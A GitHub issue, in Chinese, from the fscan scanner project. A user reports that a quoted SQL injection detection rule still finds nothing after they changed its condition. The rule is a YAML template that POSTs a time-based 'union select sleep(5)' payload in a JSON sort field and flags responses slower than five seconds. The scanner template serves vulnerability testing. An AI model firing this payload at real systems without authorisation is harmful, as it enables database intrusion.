Poc目录里搜索 sleep有例子。更换了条件还是检测不到

Open Zer08Bytes opened this issue 1 year ago • 0 comments

          Poc目录里搜索 sleep有例子。

name: riskscanner-list-sqli
rules:
  - method: POST
    path: /resource/list/1/10
    headers:
      Content-Type: application/json;charset=UTF-8
    body: "\
    {\"sort\":\"1)a union select sleep(5) -- -\"}\r\n\
    "
    expression: |
      response.status == 200 &&  response.duration >= 5.0

Originally posted by @shadow1ng in https://github.com/shadow1ng/fscan/issues/370#issuecomment-2317125023

更换了还是检测不到

Aug 29 '24 10:08 Zer08Bytes

Poc目录里搜索 sleep有例子。 更换了条件 还是检测不到

Poc目录里搜索 sleep有例子。更换了条件还是检测不到